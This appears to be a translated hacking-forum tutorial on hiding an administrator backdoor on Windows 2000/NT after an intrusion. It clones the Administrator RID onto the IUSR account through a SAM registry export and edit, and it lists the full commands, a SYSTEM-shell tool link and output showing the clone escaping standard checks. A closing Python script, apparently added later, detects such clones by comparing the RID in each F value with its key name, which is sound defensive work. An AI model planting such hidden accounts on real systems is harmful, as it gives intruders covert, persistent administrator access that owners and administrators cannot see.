It is often seen that after intruding into a Windows 2000 or Windows NT machine, some people create a new account in the Administrators group. It would be much better if no such account appeared to exist at all, so today, against my earlier intention, I am sharing something that works a bit like a rootkit. Of course, these steps could also be scripted, but I will not write that script. OK, show time.
First, a bit of background: in Windows 2000 and Windows NT the built-in Administrator account always has the SID ending in 500 (0x1F4). We can take an existing account on the machine and clone the account with SID 500 onto it. Here we use IUSR_MachineName (we chose this account for concealment; any user would work with the method below, but this one exists on most machines). The test environment is Windows 2000 Server.
Run a SYSTEM-level CMD shell (see http://www.sometips.com/tips/scripts/173.htm, or use http://www.sometips.com/soft/psu.exe) and then run:
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
This exports the registry data of the Administrator account (SID 500). Now edit adam.reg: its third line is [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4], and the trailing 1F4 must be changed to the SID of IUSR_MachineName (on most machines this user's SID is 0x3E9; if an account was created before IIS was installed, it may be a different value). So change 1F4 to 3E9 in the reg file and run:
regedit /s adam.reg
This imports the reg file silently. Then run:
net user IUSR_MachineName Sometips
This sets the IUSR_MachineName password to Sometips (a 14-character password is best; the stronger the IUSR_MachineName password, the better).
Logging on with this account now gives us the same desktop and profile as the built-in Administrator. And when we run net localgroup administrators, look at the result:
C:\> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.
Now look at the output of user2sid:
C:\> user2sid Administrator
S-1-5-21-1004336348-1078145449-854245398-500
Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
C:\> user2sid iusr_machinename
S-1-5-21-1004336348-1078145449-854245398-1001
Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
I don't think even a sharp administrator would notice anything abnormal here... and I can now log on as IUSR_MachineName with the password Sometips... (Hardly any administrator ever bothers to rename IUSR_MachineName.)
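Neither net localgroup nor user2sid shows the clone because both look at the key name and group list, while the imported adam.reg overwrote the target key's fixed-length F value, which carries Administrator's RID 500 at offset 0x30 (the SAMP_V1_0A_FIXED_LENGTH_USER layout) even though the key is still named 000003E9. Comparing the RID inside each F value with its key name is the standard check for cloned accounts. The check below is an added example, not code from the original post; it assumes the F values have already been read out of the SAM hive and runs here on constructed sample data.

```python
import struct

# Offsets inside the fixed-length SAM "F" value (SAMP_V1_0A_FIXED_LENGTH_USER layout):
# five 8-byte timestamps follow the 8-byte header, then UserId (the RID) at 0x30,
# PrimaryGroupId at 0x34 and UserAccountControl (the ACB flags) at 0x38.
F_RID_OFFSET = 0x30
F_UAC_OFFSET = 0x38
F_MIN_LEN = F_UAC_OFFSET + 4


def f_value_rid(f_value: bytes) -> int:
    """Return the RID embedded in an F value, refusing blobs too short to hold it."""
    if len(f_value) < F_MIN_LEN:
        raise ValueError(f"F value too short ({len(f_value)} bytes, need {F_MIN_LEN})")
    return struct.unpack_from("<I", f_value, F_RID_OFFSET)[0]


def find_cloned_accounts(users: dict) -> list:
    """users maps each Users subkey name (hex RID such as '000003E9') to its F value.

    A subkey whose F value names a different RID than the key itself has had another
    account's F value written into it, which is exactly what the clone step does."""
    findings = []
    for key_name, f_value in users.items():
        key_rid = int(key_name, 16)
        try:
            embedded_rid = f_value_rid(f_value)
        except ValueError as exc:
            findings.append({"key": key_name, "issue": str(exc)})
            continue
        if embedded_rid != key_rid:
            findings.append({"key": key_name, "key_rid": key_rid,
                             "f_rid": embedded_rid, "issue": "RID mismatch (possible clone)"})
    return findings


def make_f_value(rid: int, uac: int = 0x0010) -> bytes:
    """Constructed sample F blob: zeroed except the RID and UAC fields read above."""
    buf = bytearray(0x50)
    struct.pack_into("<I", buf, F_RID_OFFSET, rid)
    struct.pack_into("<I", buf, F_UAC_OFFSET, uac)
    return bytes(buf)


# Constructed SAM snapshot: Administrator (0x1F4) and Guest (0x1F5) are untouched; the
# IUSR_MachineName key (0x3E9) holds a copy of Administrator's F value, as after the import.
SAMPLE_USERS = {
    "000001F4": make_f_value(0x1F4),
    "000001F5": make_f_value(0x1F5),
    "000003E9": make_f_value(0x1F4),
}

if __name__ == "__main__":
    for finding in find_cloned_accounts(SAMPLE_USERS):
        print(finding)
```

On a live system the F values are only readable with SYSTEM rights (the same requirement as the regedit export above) or from an offline copy of the SAM hive, so this check is best run from a scheduled SYSTEM task or against a backup.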